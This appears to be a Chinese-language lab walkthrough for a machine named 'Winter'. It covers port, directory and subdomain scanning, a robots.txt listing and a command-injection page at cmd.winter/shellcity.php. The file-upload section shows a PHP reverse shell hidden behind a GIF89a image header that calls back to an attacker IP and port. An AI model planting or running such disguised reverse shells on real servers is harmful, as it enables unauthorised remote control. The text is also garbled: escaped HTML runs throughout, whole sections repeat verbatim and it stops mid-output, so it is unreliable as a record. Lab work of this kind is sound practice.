![\"image-20240818235813789\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253537.png\")
<\/div>\n
![\"image-20240819000154145\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253539.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 39:47:4a:a2:1d:53:5a:d4:9e:4e:2e:61:61:e9:bb:82 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDqHXuDutkB5xoqMwpMpuS7umCM8ebmE\/c+fpbf0PXFflthVpqP4T+\/QVA6aGN2bOAAJfn2l2+UGVV7zHM7jnXCHIF18keM8KGrl8+ZIY7XhH1k2zvbXmAs1NgyxJ9bSi8IInwqnXwihfTDql0Cv+zASrueaieIjm1g4a1L5MwcrCcBfQjuWrdzTTu6BG3tr62rWfplin+6boUVGtqAuGHeHtbMxMAM7ZrpvT4bBe2I1M7euxHiaThU1tKpAIgn67tUHeaoCuAHR3TkTBZcucb+EQ9O2NUnMYpiwJG0nl24CEX8ji2TmaQxJ9NbDd7WDIt\/HNKMbCGai4xeo5yCCMDN\n| 256 dc:48:cb:c6:f5:41:2c:d8:5a:87:c6:2d:ff:35:ae:15 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK16DEyJyG1YywvWJ843ae4Zc27Nl0rg15gavl8qNIjip6lvTFUxDMdUkhodjyjJFWsYqSe+CoKRq4mJbU5wXRA=\n| 256 26:05:e1:dd:1c:60:af:ef:4b:b7:e5:01:ae:e2:52:ca (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBN0iUGreHnDGFQiZVkBfMmqbEYER7FPKBayP9XWoGza\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: catchme\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.106\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 403,404,301,401\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 201]\n\/news.php (Status: 302) [Size: 855] [--> login.php]\n\/about.php (Status: 302) [Size: 1018] [--> login.php]\n\/contact.php (Status: 302) [Size: 1213] [--> login.php]\n\/login.php (Status: 200) [Size: 900]\n\/home.php (Status: 302) [Size: 904] [--> login.php]\n\/signup.php (Status: 200) [Size: 856]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\n\/robots.txt (Status: 200) [Size: 237]\n\/settings.php (Status: 302) [Size: 1259] [--> login.php]\n\/fileinfo.txt (Status: 200) [Size: 52]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240819001003197\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n****** Winter ******\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \nLook for some real vulnerabilities ;)\n\nid\nwhoami\nls\npwd\nnetstat -ano\ncatchme\nwinter\ncd\ncd ..\/\nftp\nssh\nhttp\nsmtp\nmanager\nadmin\nsuperadmin\nceo\ncto\nhttps\ntftp\nnano\nvim\nparrot\nlinux\nshell<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
http:\/\/192.168.10.106\/login.php<\/code><\/pre>\n<\/div><\/p>\n\u5148\u6ce8\u518c\u4e00\u4e0b\uff1a<\/p>\n
username\npassword<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u795e\u9b54\u60c5\u51b5\uff0c\u53d1\u73b0\u4fe9\u6d1e\uff0c\u4e00\u4e2a\u662f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\uff0c\u4e00\u4e2a\u662f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u94fe\u63a5\uff1a<\/p>\n
<\/div><\/p>\n\u8fd8\u6709\u82e5\u5e72\u793a\u4f8b\uff0c\u63a5\u7740\u770b\u76ee\u5f55\u5427\uff1a<\/p>\n
# http:\/\/192.168.10.106\/fileinfo.txt\na small hint for you :)\nwinter is my domain name!<\/code><\/pre>\n\u6dfb\u52a0 dns \u89e3\u6790\uff1a<\/p>\n
192.168.10.106 winter<\/code><\/pre>\n\u4e5f\u6709\u53ef\u80fd\u662f\u6709\u540e\u7f00\uff0c\u6682\u65f6\u4e0d\u77e5\u9053\u3002\u3002<\/p>\n
fuzz<\/h4>\n
\u5c1d\u8bd5 fuzz \u4e00\u4e0b\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
ffuf -c -u http:\/\/$IP -H "Host: FUZZ.winter.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12\nffuf -c -u http:\/\/$IP -H "Host: FUZZ.winter" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12\nffuf -c -u http:\/\/$IP -H "Host: winter.FUZZ" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6536\u83b7\u3002\u3002\u3002\u3002<\/p>\n
\u7ee7\u7eed\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u5230\u4e0a\u4f20\u7684\u5730\u65b9\u4e86\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728upload<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u8fd9\u662f\u4e00\u4e2a\u65b9\u5411\uff01<\/p>\n
\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n
\u5148\u5c1d\u8bd5\u4e00\u4e0b\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ file shell.jpg \nshell.jpg: GIF image data, version 89a, 2570 x 8224\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ head shell.jpg \nGIF89a\n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.105'; \/\/ You have changed this\n $port = 1234; \/\/ And this<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u8bbf\u95ee\u4f46\u662f\u672a\u88ab\u89e3\u6790\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e<\/h3>\n
\u5c1d\u8bd5\u91cd\u65b0 fuzz \u4e00\u4e0b\uff0c\u6211\u611f\u89c9\u8fd8\u662f\u6709\u7528\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ffuf -c -u "http:\/\/winter" -H "Host: FUZZ.winter" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fs 201\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/winter\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: FUZZ.winter\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response size: 201\n________________________________________________\n\nmanager [Status: 200, Size: 199, Words: 12, Lines: 15, Duration: 8ms]\ncmd [Status: 200, Size: 198, Words: 12, Lines: 15, Duration: 2ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 3076 req\/sec :: Duration: [0:00:08] :: Errors: 0 ::<\/code><\/pre>\n\u4f7f\u7528 fs \u8fc7\u6ee4\u53ef\u4ee5\u627e\u5230\u7279\u6b8a\u7684\uff1a<\/p>\n
192.168.10.106 winter\n192.168.10.106 manager.winter\n192.168.10.106 cmd.winter<\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/winter\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 403,404,301,401\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 201]\n\/news.php (Status: 302) [Size: 855] [--> login.php]\n\/contact.php (Status: 302) [Size: 1213] [--> login.php]\n\/about.php (Status: 302) [Size: 1018] [--> login.php]\n\/home.php (Status: 302) [Size: 904] [--> login.php]\n\/login.php (Status: 200) [Size: 900]\n\/signup.php (Status: 200) [Size: 856]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\n\/robots.txt (Status: 200) [Size: 237]\n\/settings.php (Status: 302) [Size: 1259] [--> login.php]\n\/fileinfo.txt (Status: 200) [Size: 52]\nProgress: 701308 \/ 882244 (79.49%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 703036 \/ 882244 (79.69%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/manager.winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/manager.winter\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 199]\n\/news.php (Status: 302) [Size: 855] [--> login.php]\n\/contact.php (Status: 302) [Size: 1243] [--> login.php]\n\/about.php (Status: 302) [Size: 1558] [--> login.php]\n\/home.php (Status: 302) [Size: 907] [--> login.php]\n\/login.php (Status: 200) [Size: 1275]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\nProgress: 339772 \/ 882244 (38.51%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 341053 \/ 882244 (38.66%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/cmd.winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/cmd.winter\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 198]\n\/shellcity.php (Status: 200) [Size: 1040]\nProgress: 267346 \/ 882244 (30.30%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 268009 \/ 882244 (30.38%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u627e\u5230\u4e86\u5165\u53e3\u70b9\u4e86\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/cmd.winter\/shellcity.php | html2text\n\n[name ] [********************] [Send]<\/code><\/pre>\n\u5c1d\u8bd5\u778e\u641e\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 39:47:4a:a2:1d:53:5a:d4:9e:4e:2e:61:61:e9:bb:82 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDqHXuDutkB5xoqMwpMpuS7umCM8ebmE\/c+fpbf0PXFflthVpqP4T+\/QVA6aGN2bOAAJfn2l2+UGVV7zHM7jnXCHIF18keM8KGrl8+ZIY7XhH1k2zvbXmAs1NgyxJ9bSi8IInwqnXwihfTDql0Cv+zASrueaieIjm1g4a1L5MwcrCcBfQjuWrdzTTu6BG3tr62rWfplin+6boUVGtqAuGHeHtbMxMAM7ZrpvT4bBe2I1M7euxHiaThU1tKpAIgn67tUHeaoCuAHR3TkTBZcucb+EQ9O2NUnMYpiwJG0nl24CEX8ji2TmaQxJ9NbDd7WDIt\/HNKMbCGai4xeo5yCCMDN\n| 256 dc:48:cb:c6:f5:41:2c:d8:5a:87:c6:2d:ff:35:ae:15 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK16DEyJyG1YywvWJ843ae4Zc27Nl0rg15gavl8qNIjip6lvTFUxDMdUkhodjyjJFWsYqSe+CoKRq4mJbU5wXRA=\n| 256 26:05:e1:dd:1c:60:af:ef:4b:b7:e5:01:ae:e2:52:ca (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBN0iUGreHnDGFQiZVkBfMmqbEYER7FPKBayP9XWoGza\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: catchme\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.106\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 403,404,301,401\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 201]\n\/news.php (Status: 302) [Size: 855] [--> login.php]\n\/about.php (Status: 302) [Size: 1018] [--> login.php]\n\/contact.php (Status: 302) [Size: 1213] [--> login.php]\n\/login.php (Status: 200) [Size: 900]\n\/home.php (Status: 302) [Size: 904] [--> login.php]\n\/signup.php (Status: 200) [Size: 856]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\n\/robots.txt (Status: 200) [Size: 237]\n\/settings.php (Status: 302) [Size: 1259] [--> login.php]\n\/fileinfo.txt (Status: 200) [Size: 52]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n****** Winter ******\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \nLook for some real vulnerabilities ;)\n\nid\nwhoami\nls\npwd\nnetstat -ano\ncatchme\nwinter\ncd\ncd ..\/\nftp\nssh\nhttp\nsmtp\nmanager\nadmin\nsuperadmin\nceo\ncto\nhttps\ntftp\nnano\nvim\nparrot\nlinux\nshell<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
http:\/\/192.168.10.106\/login.php<\/code><\/pre>\n<\/div><\/p>\n\u5148\u6ce8\u518c\u4e00\u4e0b\uff1a<\/p>\n
username\npassword<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u795e\u9b54\u60c5\u51b5\uff0c\u53d1\u73b0\u4fe9\u6d1e\uff0c\u4e00\u4e2a\u662f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\uff0c\u4e00\u4e2a\u662f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u94fe\u63a5\uff1a<\/p>\n
<\/div><\/p>\n\u8fd8\u6709\u82e5\u5e72\u793a\u4f8b\uff0c\u63a5\u7740\u770b\u76ee\u5f55\u5427\uff1a<\/p>\n
# http:\/\/192.168.10.106\/fileinfo.txt\na small hint for you :)\nwinter is my domain name!<\/code><\/pre>\n\u6dfb\u52a0 dns \u89e3\u6790\uff1a<\/p>\n
192.168.10.106 winter<\/code><\/pre>\n\u4e5f\u6709\u53ef\u80fd\u662f\u6709\u540e\u7f00\uff0c\u6682\u65f6\u4e0d\u77e5\u9053\u3002\u3002<\/p>\n
fuzz<\/h4>\n
\u5c1d\u8bd5 fuzz \u4e00\u4e0b\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
ffuf -c -u http:\/\/$IP -H "Host: FUZZ.winter.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12\nffuf -c -u http:\/\/$IP -H "Host: FUZZ.winter" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12\nffuf -c -u http:\/\/$IP -H "Host: winter.FUZZ" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 12<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6536\u83b7\u3002\u3002\u3002\u3002<\/p>\n
\u7ee7\u7eed\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u5230\u4e0a\u4f20\u7684\u5730\u65b9\u4e86\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728upload<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u8fd9\u662f\u4e00\u4e2a\u65b9\u5411\uff01<\/p>\n
\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n
\u5148\u5c1d\u8bd5\u4e00\u4e0b\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ file shell.jpg \nshell.jpg: GIF image data, version 89a, 2570 x 8224\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ head shell.jpg \nGIF89a\n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.105'; \/\/ You have changed this\n $port = 1234; \/\/ And this<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u8bbf\u95ee\u4f46\u662f\u672a\u88ab\u89e3\u6790\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e<\/h3>\n
\u5c1d\u8bd5\u91cd\u65b0 fuzz \u4e00\u4e0b\uff0c\u6211\u611f\u89c9\u8fd8\u662f\u6709\u7528\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ffuf -c -u "http:\/\/winter" -H "Host: FUZZ.winter" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fs 201\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/winter\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: FUZZ.winter\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response size: 201\n________________________________________________\n\nmanager [Status: 200, Size: 199, Words: 12, Lines: 15, Duration: 8ms]\ncmd [Status: 200, Size: 198, Words: 12, Lines: 15, Duration: 2ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 3076 req\/sec :: Duration: [0:00:08] :: Errors: 0 ::<\/code><\/pre>\n\u4f7f\u7528 fs \u8fc7\u6ee4\u53ef\u4ee5\u627e\u5230\u7279\u6b8a\u7684\uff1a<\/p>\n
192.168.10.106 winter\n192.168.10.106 manager.winter\n192.168.10.106 cmd.winter<\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/winter\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 403,404,301,401\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 201]\n\/news.php (Status: 302) [Size: 855] [--> login.php]\n\/contact.php (Status: 302) [Size: 1213] [--> login.php]\n\/about.php (Status: 302) [Size: 1018] [--> login.php]\n\/home.php (Status: 302) [Size: 904] [--> login.php]\n\/login.php (Status: 200) [Size: 900]\n\/signup.php (Status: 200) [Size: 856]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\n\/robots.txt (Status: 200) [Size: 237]\n\/settings.php (Status: 302) [Size: 1259] [--> login.php]\n\/fileinfo.txt (Status: 200) [Size: 52]\nProgress: 701308 \/ 882244 (79.49%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 703036 \/ 882244 (79.69%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/manager.winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/manager.winter\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 199]\n\/news.php (Status: 302) [Size: 855] [--> login.php]\n\/contact.php (Status: 302) [Size: 1243] [--> login.php]\n\/about.php (Status: 302) [Size: 1558] [--> login.php]\n\/home.php (Status: 302) [Size: 907] [--> login.php]\n\/login.php (Status: 200) [Size: 1275]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\nProgress: 339772 \/ 882244 (38.51%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 341053 \/ 882244 (38.66%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ gobuster dir -u http:\/\/cmd.winter -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/cmd.winter\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: 